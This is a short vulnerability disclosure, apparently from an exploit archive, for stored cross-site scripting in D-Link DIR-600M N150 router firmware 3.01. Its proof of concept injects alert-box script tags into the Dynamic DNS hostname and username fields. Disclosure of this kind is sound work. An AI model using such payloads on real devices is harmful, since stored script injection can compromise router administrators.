D-Link Dir-600M N150 Cross Site Scripting

D-Link Dir-600M N150 suffers from a cross site scripting vulnerability.


MD5 | fe2dec3461b19b00eec8b1eee19db6f5

# Exploit Title: D-Link Dir-600M N150 - Cross-Site Scripting
# Date: 2018-09-06
# Exploit Author: PUNIT DARJI
# Vendor Homepage: www.dlink.co.in
# Hardware Link: https://amzn.to/2NUIniO
# Version: DIR-600M Firmware 3.01
# Tested on: Windows 7 ultimate
# CVE: N/A

#POC

Goto your Wifi Router Gateway [i.e: 192.168.X.X ip address of router]
Go to --> "Advance" --> "Dynamic DNS" --> "Hostname"
<script>alert("PSYCHO55")</script>
"Username" --> <script>alert("PunitDarji")</script>
and hit apply Refresh the page, and you will get the 2 pop-up first
"PSYCHO55" and second "PunitDarji".


Related Posts